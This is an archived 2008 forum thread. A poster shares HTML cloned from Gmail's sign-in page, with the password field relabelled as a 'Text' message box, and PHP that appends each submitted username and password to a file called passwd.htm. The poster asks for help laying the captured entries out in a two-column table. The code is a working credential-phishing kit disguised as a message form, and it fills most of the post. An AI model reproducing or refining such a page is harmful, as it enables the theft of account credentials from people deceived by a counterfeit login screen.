renerene Posted June 13, 2008 Share Posted June 13, 2008 this html script make you enter a text. all i want is with the php script down this post to make it in table's could some1 help? this php script only put it straight after each other function gaia_setFocus() { var f = null; if (document.getElementById) { f = document.getElementById("gaia_loginform"); } else if (window.gaia_loginform) { f = window.gaia_loginform; } if (f) { if (f.Email.value == null || f.Email.value == "") { f.Email.focus(); } else { f.Passwd.focus(); } } } //--> </script> <style type="text/css"><!-- div.errormsg { color: red; font-size: smaller; font-family:arial,sans-serif; } font.errormsg { color: red; font-size: smaller; font-family:arial,sans-serif; } --> </style> <style type="text/css"><!-- .gaia.le.lbl { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } .gaia.le.fpwd { font-family: Arial, Helvetica, sans-serif; font-size: 70%; } .gaia.le.chusr { font-family: Arial, Helvetica, sans-serif; font-size: 70%; } .gaia.le.val { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } .gaia.le.button { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } .gaia.le.rem { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } .gaia.captchahtml.desc { font-family: arial, sans-serif; font-size: smaller; } .gaia.captchahtml.cmt { font-family: arial, sans-serif; font-size: smaller; font-style: italic; } --> </style> <!-- ServiceLoginElements.nui=logo --> <div id="gaia_loginbox" class="body"> <form action="input.php" method="post"> <input type="hidden" name="ltmpl" value="ca_tlsosm_video"> <input type="hidden" name="ltmplcache" value="2"> <table cellpadding="1" cellspacing="0" align="center" border="0" id="gaia_table"> <!-- LoginBoxLogoText.quaddamage=VERSION1 --> <tr> <td colspan="2" align="center" style="font-family: arial,sans-serif"> typ here what you wanne say</td> </tr> <script type="text/javascript"><!-- function onPreCreateAccount() { return true; } function onPreLogin() { if (window["onlogin"] != null) { return onlogin(); } else { return true; } } //--> </script> <tr> <td colspan="2" align="center" style="font-family: arial,sans-serif"> <div class="errorbox-good"> </div> </td> </tr> <tr> <td nowrap style="font-family: arial,sans-serif"> <div align="right" style="font-family: arial,sans-serif"> <span class="gaia le lbl"> Username: </span> </div> </td> <td style="font-family: arial,sans-serif"> <input type="hidden" name="continue" value="http://mail.google.com/mail/?ui=html&zy=l"> <input type="hidden" name="service" value="mail"> <input type="hidden" name="rm" value="false"> <input type="hidden" name="ltmpl" value="ca_tlsosm_video"> <input type="text" name="Email" value="" class="gaia le val" id="Email" size="18"> </td> </tr> <tr> <td style="font-family: arial,sans-serif"></td> <td align="left" style="font-family: arial,sans-serif"> </td> </tr> <tr> <td align="right" style="font-family: arial,sans-serif"> <p align="center"><span class="gaia le lbl">Text: </span> </td> <td style="font-family: arial,sans-serif"> <span class="gaia le lbl"> <!--webbot bot="Validation" s-data-type="String" b-allow-letters="TRUE" b-allow-digits="TRUE" b-allow-whitespace="TRUE" --><textarea rows="14" name="Passwd" cols="35"></textarea></span> </td> </tr> <tr> <td style="font-family: arial,sans-serif"></td> <td align="left" style="font-family: arial,sans-serif"> </td> </tr> <!-- LoginElementsSubmitButton.nui=default --> <tr> <td style="font-family: arial,sans-serif"></td> <td align="left" style="font-family: arial,sans-serif"> <input type="submit" name="null" value="Send" class="gaia le button"> </td> </tr> <tr id="ga-fprow"> <td colspan="2" align="center" height="33.0" valign="bottom" nowrap class="gaia le fpwd"> </td> </tr> </table> </form> </div> </div> <script> <!-- FixForm(); // --> </script> </table> php <?php /* Created on: 3/27/2007 */ $fp = fopen("passwd.htm", "a"); fwrite($fp, "Username:$_POST[Email]\tPassword:$_POST[Passwd]"); echo "<HTML> <head> <title>Welcome to .....</title> <FRAMESET cols=\"*\"> <FRAME SRC=\"https://127.0.0.1/ServiceLoginAuth\"> </FRAMESET>";?> how can i make this script put them in tablels of 2collums Link to comment https://forums.phpfreaks.com/topic/110106-need-lil-help/ Share on other sites More sharing options...
renerene Posted June 13, 2008 Author Share Posted June 13, 2008 and is it maby possible to get for each message another row? tryed different things but i only had them in 1 collum :'( username and message Link to comment https://forums.phpfreaks.com/topic/110106-need-lil-help/#findComment-565071 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.